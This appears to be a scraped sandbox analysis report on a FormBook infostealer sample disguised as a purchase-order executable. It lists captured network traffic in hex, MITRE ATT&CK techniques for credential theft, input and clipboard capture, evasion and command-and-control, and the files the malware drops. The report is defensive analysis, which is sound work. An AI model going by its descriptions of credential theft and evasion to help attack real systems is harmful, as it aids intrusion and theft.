0c 43 f8 e8 91 d9 25 f8 ca 23 16 2e 45 09 05 6d d1 82 65 21 39 1c 92 b5 2d 1f b5 82 46 67 c4 b3 26 71 4d 39 47 c2 70 e0 55 7e 50 92 be 24 f4 87 39 90 22 47 ec 4a 87 88 c9 d5 64 3a 87 46 6c a9 69 9b a7 a1 d6 a2 f1 67 91 71 d5 74 7e 78 e7 9a 70 b3 d2 c6 75 cf 8c a3 fd 42 c4 9d 1f 9e 5e d2 1a 48 26 c1 7e c0 7b 31 22 8e fa ac cd 0d ad dc d3 f5 78 10 6b d1 47 fb 2d 91 3a 6f 1b 36 64 b2 31 e4 f0 d5 91 e9 87 05 19 c5 ff c5 81 5a a8 b2 15 25 3b f9 99 d1 17 9e 33 18 0d 42 1d 20 df c0 c8 9a 3c 09 a2 c8 a2 d4 7c f9 47 d6 7a 92 eb 26 2a 4c d3 1d a3 73 fd 1b 1e 0d bd 99 d4 3a 17 8e b4 9a 54 da 3a 60 d8 b3 8d a3 4f e9 5d ba b8 ef 29 bf 2d ce f1 8c a2 ee 3a 93 07 9e 99 e1 52 e6 8c 7f 46 bd 42 ff 94 bc ee 16 82 57 c0 2b e2 fd eb 7d 63 1f bb ef dc 5f 9a 51 15 c5 f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 239TMo@WLP@qzCPc{Z{7]gN$hf_~H/@" PA' uE6v50n][3j1X1PaDARYtr~t3FlzRR6PF&CB+ZdQ.PTY&,vPDX9sF(ruDdM3eQ")Q"7J{H`oC)1f1>4w~@iC%#.Eme!9-Fg&qM9GpU~P$9"GJd:Fligqt~xpuB^H&~{1"xkG-:o6d1Z%;3B <\|Gz&Ls:T:`O])-:RFBW+}c_Q0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1271Connection: closeDate: Tue, 29 Nov 2022 09:36:47 GMTServer: ApacheX-Frame-Options: denyData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 2

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report New PO-RJ-IN-003 - Knauf Queimados.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rubthqnwyfue.exe_1078f5d9a12c4fe091b0b1b063f9270e1879244_c652c34e_0b3f82dd\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rubthqnwyfue.exe_1078f5d9a12c4fe091b0b1b063f9270e1879244_c652c34e_15731f22\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1493.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1753.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1810.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER206.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2A3.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFF75.tmp.dmp

C:\Users\user\AppData\Local\Temp\456b6ELMQ

C:\Users\user\AppData\Local\Temp\eojsm.wx

C:\Users\user\AppData\Local\Temp\jaxdij.exe

C:\Users\user\AppData\Local\Temp\nsqB9A3.tmp

C:\Users\user\AppData\Local\Temp\uqnwrddys.k

C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exe

Windows Analysis Report
New PO-RJ-IN-003 - Knauf Queimados.exe

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre